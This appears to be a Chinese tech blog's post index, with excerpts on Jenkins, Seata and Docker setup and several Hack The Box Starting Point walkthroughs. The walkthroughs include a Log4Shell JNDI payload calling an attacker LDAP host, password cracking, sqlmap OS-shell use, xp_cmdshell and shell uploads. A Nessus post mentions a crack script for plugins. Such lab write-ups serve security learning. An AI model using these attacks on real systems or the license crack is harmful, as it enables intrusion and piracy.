Centos安装Jenkins和配置
安装Jenkins添加源并安装 wget -O /etc/yum.repos.d/jenkins.repo https://pkg.jenkins.io/redhat/jenkins.reporpm --import https://pkg.jenkins.io/redhat/jenkins.io-2023.keyyum install fontconfig java-11-openjdkyum install jenkins Jenkins 下载加速https://mirrors.tuna.tsinghua.edu.cn/jenkins/updates/update-center.json 如需修改请 导航到: 系统管理 –> 插件管理 –> 高级设置 –> 升级站点 默认地址是 https://updates.jenkins.io/update-center.json Jenkins使用本机的dockerJenkins运行使用Jenkins用户, 而docker组中么有Jenkins,导致Jenkins使用本地dockers无权限 解决办法是, 把...
k8s 部署seata1.5.2(mysql+nacos+springboot)
本文使用的是nacos+mysql的方式 大致流程: MySQL建立对应的库和表 nacos配置对应的配置,以便java等应用能从nacos获取配置 k8s部署对应的负载,负载启动以后从配置文件获取nacos地址,然后从nacos获取配置启动 MySQL 建立库和表# 创建一个数据库CREATE DATABASE `seata`; 然后进入数据库中执行建表查询 use seata; CREATE TABLE IF NOT EXISTS `global_table`( `xid` VARCHAR(128) NOT NULL, `transaction_id` BIGINT, `status` TINYINT NOT NULL, `application_id` VARCHAR(32), `transaction_service_group` VARCHAR(32), `transaction_name` ...
创建Nessus的Docker镜像 / 一键部署Nessus
Nessus支持很多种环境, docker vm 主机 aws等等, 这里主要介绍两种: 自己构建docker镜像, 也可以使用官网的, 使用一键脚本, 文章末尾提供一键脚本 参考: https://www.iculture.cc/software/pig=25546 官方提供docker版本的Nessus镜像,但是没有插件 https://docs.tenable.com/nessus/Content/DeployNessusDocker.htm docker pull tenableofficial/nessus 所以自己把插件添加进去, 在docker容器启动以后,运行下crack.sh, 就可以使用插件了 Nessus 下载地址https://www.tenable.com/downloads/nessus 扫描漏洞模块下载地址https://plugins.nessus.org/v2/nessus.php?f=all-2.0.tar.gz&u=4e2abfd83a40e2012ebf6537ade2f207&p=29a34e24fc12d3f5...
手把手构建AWVS的docker镜像
大致分为下面几个步骤 拉取debian基础镜像, 安装基础环境 添加awvs 和 license 到镜像, 并进行初始安装 构建镜像,并上传docker hub 使用镜像创建 awvs 容器 docker run -d -it --cap-add LINUX_IMMUTABLE -p 3443:3443 --name awvs k9scc/awvs:v15.4 /bin/bash /opt/awvs/start.sh 删除容器 1. 创建基础镜像Dockerfile FROM debianRUN sed -i 's/deb.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list &&\ apt update &&\ apt -y install net-tools libx11-6 libxcomposite1 libxdamage1 libxext-dev libxfixes-dev libxrandr-dev libasound2 libatk...
docker容器中使用chattr修改文件权限报错 "chattr Operation not permitted while setting flags on ***"
docker中默认是禁止 CAP_LINUX_IMMUTABLE 的 像chattr这些命令,是无法正常使用的, 如果使用 chattr +i file 会提示 chattr: Operation not permitted while setting flags on *** 要正常使用chattr等命令, 需要开启 CAP_LINUX_IMMUTABLE docker run -it --cap-add LINUX_IMMUTABLE xxx 如果提示没有chattr命令,需要安装e2fsprogs centos/redhat/archlinux yum -y install e2fsprogs debian/ubuntu apt-get install e2fsprogs
Hack The Box :: Starting Point - Unified
扫描, 开放端口,22,6789,8443,8080nmap -A 10.129.56.105 --open 访问https://10.129.56.105:8443 经过搜索发现漏洞为 cve-2021-44228https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi 登录 抓包 把post的包发到Repeater,tcpdump监听网卡389端口,ldap默认389, 然后改包,发送, 可以看到收到一个发往端口389的数据包 "remember":false,#改为 ${jndi:ldap://本地IP地址}"remember":"${jndi:ldap://10.10.16.130/o=tomcat}", 部署一个jndi#安装编译环境并拉取项目编译apt install maven -ygit clone https://github.com/veracod...
Hack The Box :: Starting Point - Vaccine
老规矩,扫描nmap -A 10.129.89.216 -v --open ftp匿名登录,有个backup.zip文件, 下载下来看下 backup.zip文件需要密码, 使用john进行破解,获取到密码 741852963zip2john backup.zip > hashjohn --wordlist=/usr/share/wordlists/rockyou.txt hashjohn --show hash 解压后, 查看index.php发现登录是进行hash对比, hash值是cmd5加密,解密后得到 qwerty789cat index.php https://www.somd5.com/ 用上面的信息访问下我们的网站 adminqwerty789 登录 搜索框有个搜索, 尝试用sqlmap跑下看看有没有注入, 同时需要带上phpsession的cookiesqlmap -url "http://10.129.89.216/dashboard.php?search=1" --cookie="PHPSESSID=2d...
Hack The Box :: Starting Point - Oopsie
扫描发现22,80开放nmap -sV 10.129.114.125 访问web,发现/cdn-cgi/login/路径 另外爆破路径可以用gobuster,成功率取决与字典gobuster dir -u http://10.129.114.125 -w 字典路径 访问http://10.129.114.125/cdn-cgi/login/ , 有个login as guest 页面Account url id=2,替换为1会是什么样呢 cookies 修改cookie值,role为admin, user为34322刷新 ,可以发现upload可以上传东西 也可以对登陆页面可以暴力破解,但是通过上面的绕过更方便可以用burpsuite也可以用hydra 登录并查看请求信息 请求地址 http://10.129.114.125/cdn-cgi/login/index.php post的数据username=admin&password=1 hydra -l admin -P pass.txt -f 10.129.41.170 h...
Hack The Box :: Starting Point - Archetype
扫描nmap 10.129.95.187 -sV 查看smb共享目录smbclient -L 10.129.95.187 获取共享文件,看到用户名 ARCHETYPE\sql_svc 密码M3g4c0rp123smbclient \\\\10.129.95.187\\backups ls get prod.dtsConfig 使用smbclient.py进行数据库连接,也可以用sqlmap,sqlmap更方便一些https://github.com/fortra/impacket #msclientpython mssqlclient.py sql_svc@10.129.95.187 -windows-auth#sqlmapsqlmap -d "mssql://ARCHETYPE\\sql_svc:M3g4c0rp123@10.129.95.187:1433/" --os-shell 使用sql命令开启xp_cmdshell执行系统命令效果和sqlmap的一样,二选一即可enable_xp_cmdshellRECON...
Hack The Box :: Starting Point - Three
扫描nmap -T4 -Pn -sVC -p- 10.129.27.183 开放端口22, 80 访问80 http://10.129.27.183/#contact 找到联系方式 thetoppers.htb 根据提示写入域名到hosts,然后爆破子域名echo "10.129.27.183 thetoppers.htb" >> /etc/hostsgobuster vhost -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -u http://thetoppers.htb/ #耐何没有爆破出来echo "10.129.27.183 s3.thetoppers.htb" >> /etc/hosts 一开始题目提示是 s3.thetoppers.htb 安装AWS客户端apt install awscli -yaws configure # 配置 上传shellaws --endpoint=http://s3.thetop...







